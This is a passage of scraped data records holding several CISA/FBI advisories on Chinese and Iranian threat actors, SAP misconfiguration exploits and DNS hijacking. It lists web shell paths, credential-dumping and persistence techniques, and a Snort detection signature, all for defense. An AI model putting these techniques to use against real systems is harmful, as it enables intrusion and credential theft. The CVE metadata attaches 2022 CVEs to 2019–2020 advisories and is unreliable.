and information systems. \n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:%20CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:%20Central@cisa.dhs.gov>).\n\n### References\n\n[[1] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[2] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[3] Shodan](<https://www.shodan.io>)\n\n[[4] MITRE Common Vulnerabilities and Exposures List](<https://cve.mitre.org>)\n\n[[5] National Institute of Standards and Technology National Vulnerability Database](<https://nvd.nist.gov/>)\n\n[[6] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[7] CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)\n\n[[8] CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n\n[[9] CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)\n\n[[10] GitHub](<https://www.GitHub.com>)\n\n[[11] Exploit-DB](<https://www.exploit-db.com/>)\n\n[[12] What is Mimikatz: The Beginner's Guide (VARONIS)](<https://www.varonis.com/blog/what-is-mimikatz/>)\n\n### Revisions\n\nSeptember 14, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-10-24T12:00:00", "id": "AA20-258A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:30:36", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\nThis product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions from the Federal Bureau of Investigation (FBI). CISA and FBI are aware of an Iran-based malicious cyber actor targeting several U.S. federal agencies and other U.S.-based networks. Analysis of the threat actor\u2019s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names, Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence.\n\nThis Advisory provides the threat actor\u2019s TTPs, IOCs, and exploited CVEs to help administrators and network defenders identify a potential compromise of their network and protect their organization from future attacks.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-259A-Iran-Based_Threat_Actor_Exploits_VPN_Vulnerabilities_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nCISA and FBI are aware of a widespread campaign from an Iran-based malicious cyber actor targeting several industries mainly associated with information technology, government, healthcare, financial, insurance, and media sectors across the United States. The threat actor conducts mass-scanning and uses tools, such as Nmap, to identify open ports. Once the open ports are identified, the threat actor exploits CVEs related to VPN infrastructure to gain initial access to a targeted network. CISA and the FBI have observed the threat actor exploiting multiple CVEs, including CVE-2019-11510, CVE-2019-11539, CVE-2019-19781, and CVE-2020-5902.\n\nAfter gaining initial access to a targeted network, the threat actor obtains administrator-level credentials and installs web shells allowing further entrenchment. After establishing a foothold, the threat actor\u2019s goals appear to be maintaining persistence and exfiltrating data. This threat actor has been observed selling access to compromised network infrastructure in an online hacker forum. Industry reporting indicates that the threat actor operates as a contractor supporting Iranian government interests, but the malicious activity appears to also serve the threat actor\u2019s own financial interests. The FBI notes this threat actor has the capability, and likely the intent, to deploy ransomware on victim networks.\n\nCISA and FBI have observed this Iran-based threat actor relying on exploits of remote external services on internet-facing assets to gain initial access to victim networks. The threat actor also relies heavily on open-source and operating system (OS) tooling to conduct operations, such as ngrok; fast reverse proxy (FRP); Lightweight Directory Access Protocol (LDAP) directory browser; as well as web shells known as ChunkyTuna, Tiny, and China Chopper.\n\nTable 1 illustrates some of the common tools this threat actor has used.\n\n_Table 1: Common exploit tools_\n\nTool\n\n| \n\nDetail \n \n---|--- \n \nChunkyTuna web shell\n\n| ChunkyTuna allows for chunked transfer encoding hypertext transfer protocol (HTTP) that tunnels Transmission Control Protocol (TCP) streams over HTTP. The web shell allows for reverse connections to a server with the intent to exfiltrate data. \n \nTiny web shell\n\n| Tiny uses Hypertext Preprocessor (PHP) to create a backdoor. It has the capability to allow a threat actor remote access to the system and can also tunnel or route traffic. \n \nChina Chopper web shell\n\n| China Chopper is a web shell hosted on a web server and is mainly used for web application attacks; it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \nFRPC | FRPC is a modified version of the open-source FRP tool. It allows a system\u2014inside a router or firewall providing Network Address Translation\u2014to provide network access to systems/operators located outside of the victim network. In this case, FRPC was used as reverse proxy, tunneling Remote Desktop Protocol (RDP) over Transport Layer Security (TLS), giving the threat actor primary persistence. \nChisel | Chisel is a fast TCP tunnel over HTTP and secured via Secure Shell (SSH). It is a single executable that includes both client and server. The tool is useful for passing through firewalls, but it can also be used to provide a secure form of communication to an endpoint on a victim network. \nngrok | ngrok is a tool used to expose a local port to the internet. Optionally, tunnels can be secured with TLS. \nNmap | Nmap is used for vulnerability scanning and network discovery. \nAngry IP Scanner | Angry IP Scanner is a scanner that can ping a range of Internet Protocol (IP) addresses to check if they are active and can also resolve hostnames, scan ports, etc. \nDrupwn | Drupwn is a Python-based tool used to scan for vulnerabilities and exploit CVEs in Drupal devices. \n \nNotable means of detecting this threat actor:\n\n * CISA and the FBI note that this group makes significant use of ngrok, which may appear as TCP port 443 connections to external cloud-based infrastructure.\n * The threat actor uses FRPC over port 7557.\n * [Malware Analysis Report MAR-10297887-1.v1](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a>) details some of the tools this threat actor used against some victims.\n\nThe following file paths can be used to detect Tiny web shell, ChunkyTuna web shell, or Chisel if a network has been compromised by this attacker exploiting CVE-2019-19781.\n\n * Tiny web shell\n\n` /netscaler/ns_gui/admin_ui/rdx/core/css/images/css.php \n/netscaler/ns_gui/vpn/images/vpn_ns_gui.php \n/var/vpn/themes/imgs/tiny.php`\n\n * ChunkyTuna web shell\n\n` /var/vpn/themes/imgs/debug.php \n/var/vpn/themes/imgs/include.php \n/var/vpn/themes/imgs/whatfile`\n\n * Chisel\n\n` /var/nstmp/chisel`\n\n### MITRE ATT&CK Framework\n\n#### Initial Access\n\nAs indicated in table 2, the threat actor primarily gained initial access by using the publicly available exploit for CVE-2019-19781. From there, the threat actor used the Citrix environment to establish a presence on an internal network server.\n\n_Table 2: Initial access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1190](<https://attack.mitre.org/techniques/T1190/>)\n\n| Exploit Public-Facing Application | The threat actor primarily gained initial access by compromising a Citrix NetScaler remote access server using a publicly available exploit for CVE-2019-19781. The threat actor also exploited CVE-2019-11510, CVE-2019-11539, and CVE-2020-5902. \n \n#### Execution\n\nAfter gaining initial access, the threat actor began executing scripts, as shown in table 3.\n\n_Table 3: Execution techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1059.001](<https://attack.mitre.org/techniques/T1059/001/>)\n\n| Command and Scripting Interpreter: PowerShell | A PowerShell script (`keethief` and `kee.ps1`) was used to access KeePass data. \n \n[T1059.003](<https://attack.mitre.org/techniques/T1059/003/>)\n\n| Command and Scripting Interpreter: Windows Command Shell | `cmd.exe` was launched via sticky keys that was likely used as a password changing mechanism. \n \n#### Persistence\n\nCISA observed the threat actor using the techniques identified in table 4 to establish persistence.\n\n_Table 4: Persistence techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1053.003](<https://attack.mitre.org/techniques/T1053/003/>)\n\n| Scheduled Task/Job: Cron | The threat actor loaded a series of scripts to `cron` and ran them for various purposes (mainly to access NetScaler web forms). \n \n[T1053.005](<https://attack.mitre.org/techniques/T1053/005/>)\n\n| Scheduled Task/Job: Scheduled Task | The threat actor installed and used FRPC (`frpc.exe`) on both NetScaler and internal devices. The task was named `lpupdate` and the binary was named `svchost`, which was the reverse proxy. The threat actor executed this command daily. \n \n[T1505.003](<https://attack.mitre.org/techniques/T1505/003/>)\n\n| Server Software Component: Web Shell | The threat actor used several web shells on existing web servers. Both NetScaler and web servers called out for ChunkyTuna. \n \n[T1546.008](<https://attack.mitre.org/techniques/T1546/008/>)\n\n| Event Triggered Execution: Accessibility Features | The threat actor used sticky keys (`sethc.exe`) to launch `cmd.exe`. \n \n#### Privilege Escalation\n\nCISA observed no evidence of direct privilege escalation. The threat actor attained domain administrator credentials on the NetScaler device via exploit and continued to expand credential access on the network.\n\n#### Defense Evasion\n\nCISA observed the threat actor using the techniques identified in table 5 to evade detection.\n\n_Table 5: Defensive evasion techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1027.002](<https://attack.mitre.org/techniques/T1027/002/>)\n\n| Obfuscated Files or Information: Software Packing | The threat actor used base64 encoding for payloads on NetScaler during initial access, making the pre-compiled payloads easier to avoid detection. \n \n[T1027.004](<https://attack.mitre.org/techniques/T1036/004/>)\n\n| Obfuscated Files or Information: Compile After Delivery | The threat actor used base64 encoding schemes on distributed (uncompiled) scripts and files to avoid detection. \n \n[T1036.004](<https://attack.mitre.org/techniques/T1245/>)\n\n| Masquerading: Masquerade Task or Service | The threat actor used FRPC (`frpc.exe`) daily as reverse proxy, tunneling RDP over TLS. The FRPC (`frpc.exe`) task name was `lpupdate` and ran out of Input Method Editor (IME) directory. In other events, the threat actor has been observed hiding activity via ngrok. \n \n[T1036.005](<https://attack.mitre.org/techniques/T1036/005/>)\n\n| Masquerading: Match Legitimate Name or Location | The FRPC (`frpc.exe`) binary name was `svchost`, and the configuration file was `dllhost.dll`, attempting to masquerade as a legitimate Dynamic Link Library. \n \n[T1070.004](<https://attack.mitre.org/techniques/T1070/004/>)\n\n| Indicator Removal on Host: File Deletion | To minimize their footprint, the threat actor ran `./httpd-nscache_clean` every 30 minutes, which cleaned up files on the NetScaler device. \n \n#### Credential Access\n\nCISA observed the threat actor using the techniques identified in table 6 to further their credential access.\n\n_Table 6: Credential access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/techniques/T1003/001/>)\n\n| OS Credential Dumping: LSASS Memory | The threat actor used `procdump` to dump process memory from the Local Security Authority Subsystem Service (LSASS). \n \n[T1003.003](<https://attack.mitre.org/techniques/T1003/003/>)\n\n| OS Credential Dumping: Windows NT Directory Services (NTDS) | The threat actor used Volume Shadow Copy to access credential information from the NTDS file. \n \n[T1552.001](<https://attack.mitre.org/techniques/T1552/001/>)\n\n| Unsecured Credentials: Credentials in Files | The threat actor accessed files containing valid credentials. \n \n[T1555](<https://attack.mitre.org/techniques/T1555/>)\n\n| Credentials from Password Stores | The threat actor accessed a `KeePass` database multiple times and used `kee.ps1` PowerShell script. \n \n[T1558](<https://attack.mitre.org/techniques/T1558/>)\n\n| Steal or Forge Kerberos Tickets | The threat actor conducted a directory traversal attack by creating files and exfiltrating a Kerberos ticket on a NetScaler device. The threat actor was then able to gain access to a domain account. \n \n#### Discovery\n\nCISA observed the threat actor using the techniques identified in table 7 to learn more about the victim environments.\n\n_Table 7: Discovery techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1018](<https://attack.mitre.org/techniques/T1018/>)\n\n| Remote System Discovery | The threat actor used Angry IP Scanner to detect remote systems. \n \n[T1083](<https://attack.mitre.org/techniques/T1083/>)\n\n| File and Directory Discovery | The threat actor used WizTree to obtain network files and directory listings. \n \n[T1087](<https://attack.mitre.org/techniques/T1087/>)\n\n| Account Discovery | The threat actor accessed `ntuser.dat` and `UserClass.dat` and used Softerra LDAP Browser to browse documentation for service accounts. \n \n[T1217](<https://attack.mitre.org/techniques/T1217/>)\n\n| Browser Bookmark Discovery | The threat actor used Google Chrome bookmarks to find internal resources and assets. \n \n#### Lateral Movement\n\nCISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment.\n\n_Table 8: Lateral movement techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1021](<https://attack.mitre.org/techniques/T1021/>)\n\n| Remote Services | The threat actor used RDP with valid account credentials for lateral movement in the environment. \n \n[T1021.001](<https://attack.mitre.org/techniques/T1021/001/>)\n\n| Remote Services: Remote Desktop Protocol | The threat actor used RDP to log in and then conduct lateral movement. \n \n[T1021.002](<https://attack.mitre.org/techniques/T1021/002/>)\n\n| Remote Services: SMB/Windows Admin Shares | The threat actor used PsExec. and PSEXECSVC pervasively on several hosts. The threat actor was also observed using a valid account to access SMB shares. \n \n[T1021.004](<https://attack.mitre.org/techniques/T1021/004/>)\n\n| Remote Services: SSH | The threat actor used Plink and PuTTY for lateral movement. Artifacts of Plink were used for encrypted sessions in the system registry hive. \n \n[T1021.005](<https://attack.mitre.org/techniques/T1021/005/>)\n\n| Remote Services: Virtual Network Computing (VNC) | The threat actor installed TightVNC server and client pervasively on compromised servers and endpoints in the network environment as lateral movement tool. \n \n[T1563.002](<https://attack.mitre.org/techniques/T1563/002/>)\n\n| Remote Service Session Hijacking: RDP Hijacking | The threat actor likely hijacked a legitimate RDP session to move laterally within the network environment. \n \n#### Collection\n\nCISA observed the threat actor using the techniques identified in table 9 for collection within the victim environment.\n\n_Table 9: Collection techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1005](<https://attack.mitre.org/techniques/T1005/>)\n\n| Data from Local System | The threat actor searched local system sources to accessed sensitive documents. \n \n[T1039](<https://attack.mitre.org/techniques/T1039/>)\n\n| Data from Network Shared Drive | The threat actor searched network shares to access sensitive documents. \n \n[T1213](<https://attack.mitre.org/techniques/T1213/>)\n\n| Data from Information Repositories | The threat actor accessed victim security/IT monitoring environments, Microsoft Teams, etc., to mine valuable information. \n \n[T1530](<https://attack.mitre.org/techniques/T1530/>)\n\n| Data from Cloud Storage Object | The threat actor obtained files from the victim cloud storage instances. \n \n[T1560.001](<https://attack.mitre.org/techniques/T1560/001/>)\n\n| Archive Collected Data: Archive via Utility | The threat actor used 7-Zip to archive data. \n \n#### Command and Control\n\nCISA observed the threat actor using the techniques identified in table 10 for command and control (C2).\n\n_Table 10: Command and control techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1071.001](<https://attack.mitre.org/techniques/T1071/001/>)\n\n| Application Layer Protocol: Web Protocols | The threat actor used various web mechanisms and protocols, including the web shells listed in table 1. \n \n[T1105](<https://attack.mitre.org/techniques/T1105/>)\n\n| Ingress Tool Transfer | The threat actor downloaded tools such as PsExec directly to endpoints and downloaded web shells and scripts to NetScaler in base64-encoded schemes. \n \n[T1572](<https://attack.mitre.org/techniques/T1572/>)\n\n| Protocol Tunneling | The threat actor used `FRPC.exe` to tunnel RDP over port 443. The threat actor has also been observed using ngrok for tunneling. \n \n#### Exfiltration\n\nCISA currently has no evidence of data exfiltration from this threat actor but assesses that it was likely due to the use of 7-Zip and viewing of sensitive documents.\n\n### Mitigations\n\n#### Recommendations\n\nCISA and FBI recommend implementing the following recommendations.\n\n * If your organization has not patched for the Citrix CVE-2019-19781 vulnerability, and a compromise is suspected, follow the recommendations in CISA Alert [AA20-031A](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>).\n * This threat actor has been observed targeting other CVEs mentioned in this report; follow the recommendations in the CISA resources provided below.\n * If using Windows Active Directory and compromise is suspected, conduct remediation of the compromised Windows Active Directory forest. \n * If compromised, rebuild/reimage compromised NetScaler devices.\n * Routinely audit configuration and patch management programs.\n * Monitor network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP).\n * Implement multi-factor authentication, especially for privileged accounts.\n * Use separate administrative accounts on separate administration workstations.\n * Implement the principle of least privilege on data access.\n * Secure RDP and other remote access solutions using multifactor authentication and \u201cjump boxes\u201d for access.\n * Deploy endpoint defense tools on all endpoints; ensure they work and are up to date.\n * Keep software up to date.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:%20CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:%20Central@cisa.dhs.gov>).\n\n### Resources\n\n[CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>) \n[CISA Alert AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>) \n[CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>) \n[CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>) \n[CISA Security Tip: Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>)\n\n### Revisions\n\nSeptember 15, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T12:00:00", "type": "ics", "title": "Iran-Based Threat Actor Exploits VPN Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-11539", "CVE-2019-19781", "CVE-2020-5902", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-09-15T12:00:00", "id": "AA20-259A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-259a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T08:01:09", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is issuing this activity alert in response to recently disclosed exploits that target unsecure configurations of SAP components. [[1](<https://github.com/comaeio/OPCDE/tree/master/2019/Emirates/\$SAP\$%20Gateway%20to%20Heaven%20-%20Dmitry%20Chastuhin%2C%20Mathieu%20Geli>)]\n\n### Technical Details\n\nA presentation at the April 2019 Operation for Community Development and Empowerment (OPCDE) cybersecurity conference describes SAP systems with unsecure configurations exposed to the internet. Typically, SAP systems are not intended to be exposed to the internet as it is an untrusted network. Malicious cyber actors can attack and compromise these unsecure systems with publicly available exploit tools, termed \u201c10KBLAZE.\u201d The presentation details the new exploit tools and reports on systems exposed to the internet.\n\n#### SAP Gateway ACL\n\nThe SAP Gateway allows non-SAP applications to communicate with SAP applications. If SAP Gateway access control lists (ACLs) are not configured properly (e.g., gw/acl_mode = 0), anonymous users can run operating system (OS) commands.[[2](<https://wiki.scn.sap.com/wiki/display/SI/Gateway+Access+Control+Lists>)] According to the OPCDE presentation, about 900 U.S. internet-facing systems were detected in this vulnerable condition.\n\n#### SAP Router secinfo\n\nThe SAP router is a program that helps connect SAP systems with external networks. The default `secinfo` configuration for a SAP Gateway allows any internal host to run OS commands anonymously. If an attacker can access a misconfigured SAP router, the router can act as an internal host and proxy the attacker\u2019s requests, which may result in remote code execution.\n\nAccording to the OPCDE presentation, 1,181 SAP routers were exposed to the internet. It is unclear if the exposed systems were confirmed to be vulnerable or were simply running the SAP router service.\n\n#### SAP Message Server\n\nSAP Message Servers act as brokers between Application Servers (AS). By default, Message Servers listen on a port 39XX and have no authentication. If an attacker can access a Message Server, they can redirect and/or execute legitimate man-in-the-middle (MITM) requests, thereby gaining credentials. Those credentials can be used to execute code or operations on AS servers (assuming the attacker can reach them). According to the OPCDE presentation, there are 693 Message Servers exposed to the internet in the United States. The Message Server ACL must be protected by the customer in all releases.\n\n#### Signature\n\nCISA worked with security researchers from Onapsis Inc.[[3](<https://www.onapsis.com/>)] to develop the following Snort signature that can be used to detect the exploits:\n\nalert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:\"10KBLAZE SAP Exploit execute attempt\"; flow:established,to_server; content:\"|06 cb 03|\"; offset:4; depth:3; content:\"SAPXPG_START_XPG\"; nocase; distance:0; fast_pattern; content:\"37D581E3889AF16DA00A000C290099D0001\"; nocase; distance:0; content:\"extprog\"; nocase; distance:0; sid:1; rev:1;)\n\n### Mitigations\n\nCISA recommends administrators of SAP systems implement the following to mitigate the vulnerabilities included in the OPCDE presentation:\n\n * Ensure a secure configuration of their SAP landscape.\n * Restrict access to SAP Message Server. \n * Review SAP Notes 1408081 and 821875. Restrict authorized hosts via ACL files on Gateways (`gw/acl_mode `and `secinfo`) and Message Servers (`ms/acl_info`).[[4](<https://launchpad.support.sap.com/#/notes/1408081>)], [[5](<https://launchpad.support.sap.com/#/notes/821875>)]\n * Review SAP Note 1421005. Split MS internal/public:` rdisp/msserv=0 rdisp/msserv_internal=39NN`. [[6](<https://launchpad.support.sap.com/#/notes/1421005>)]\n * Restrict access to Message Server internal port (`tcp/39NN`) to clients or the internet.\n * Enable Secure Network Communications (SNC) for clients.\n * Scan for exposed SAP components. \n * Ensure that SAP components are not exposed to the internet.\n * Remove or secure any exposed SAP components.\n\n### References\n\n[[1] Comae Technologies: Operation for Community Development and Empowerment (OPCDE) Cybersecurity Conference Materials ](<https://github.com/comaeio/OPCDE/tree/master/2019/Emirates/\$SAP\$%20Gateway%20to%20Heaven%20-%20Dmitry%20Chastuhin%2C%20Mathieu%20Geli>)\n\n[[2] SAP: Gateway Access Control Lists ](<https://wiki.scn.sap.com/wiki/display/SI/Gateway+Access+Control+Lists>)\n\n[[3] Onapsis Inc. website ](<https://www.onapsis.com>)\n\n[[4] SAP Note 1408081 ](<https://launchpad.support.sap.com/#/notes/1408081>)\n\n[[5] SAP Note 821875 ](<https://launchpad.support.sap.com/#/notes/821875>)\n\n[[6] SAP Note 1421005 ](<https://launchpad.support.sap.com/#/notes/1421005>)\n\n### Revisions\n\nMay 2, 2019: Initial version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-03T12:00:00", "type": "ics", "title": "New Exploits for Unsecure SAP Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-42475", "CVE-2022-47966"], "modified": "2019-05-03T12:00:00", "id": "AA19-122A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa19-122a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T08:02:41", "description": "### Summary\n\nThe National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), is aware of a global Domain Name System (DNS) infrastructure hijacking campaign. Using compromised credentials, an attacker can modify the location to which an organization\u2019s domain name resources resolve. This enables the attacker to redirect user traffic to attacker-controlled infrastructure and obtain valid encryption certificates for an organization\u2019s domain names, enabling man-in-the-middle attacks.\n\nSee the following links for downloadable copies of open-source indicators of compromise (IOCs) from the sources listed in the References section below:\n\n * IOCs (.csv)\n * IOCs (.stix)\n\nNote: these files were last updated February 13, 2019, to remove the following three non-malicious IP addresses:\n\n * 107.161.23.204\n * 192.161.187.200\n * 209.141.38.71\n\n### Technical Details\n\nUsing the following techniques, attackers have redirected and intercepted web and mail traffic, and could do so for other networked services.\n\n 1. The attacker begins by compromising user credentials, or obtaining them through alternate means, of an account that can make changes to DNS records.\n 2. Next, the attacker alters DNS records, like Address (A), Mail Exchanger (MX), or Name Server (NS) records, replacing the legitimate address of a service with an address the attacker controls. This enables them to direct user traffic to their own infrastructure for manipulation or inspection before passing it on to the legitimate service, should they choose. This creates a risk that persists beyond the period of traffic redirection.\n 3. Because the attacker can set DNS record values, they can also obtain valid encryption certificates for an organization\u2019s domain names. This allows the redirected traffic to be decrypted, exposing any user-submitted data. Since the certificate is valid for the domain, end users receive no error warnings.\n\n### Mitigations\n\nNCCIC recommends the following best practices to help safeguard networks against this threat:\n\n * Update the passwords for all accounts that can change organizations\u2019 DNS records.\n * Implement multifactor authentication on domain registrar accounts, or on other systems used to modify DNS records.\n * Audit public DNS records to verify they are resolving to the intended location.\n * Search for encryption certificates related to domains and revoke any fraudulently requested certificates.\n\n### References\n\n[Cisco Talos blog: DNSpionage Campaign Targets Middle East ](<https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html>)\n\n[CERT-OPMD blog: [DNSPIONAGE] \u2013 Focus on internal actions](<https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions>)\n\n[FireEye blog: Global DNS Hijacking Campaign: DNS Record Manipulation at Scale ](<https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html>)\n\n[Crowdstrike blog: Widespread DNS Hijacking Activity Targets Multiple Sectors](<https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors>)\n\n### Revisions\n\nJanuary 24, 2019: Initial version|February 6, 2019: Updated IOCs, added Crowdstrike blog|February 13, 2019: Updated IOCs\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 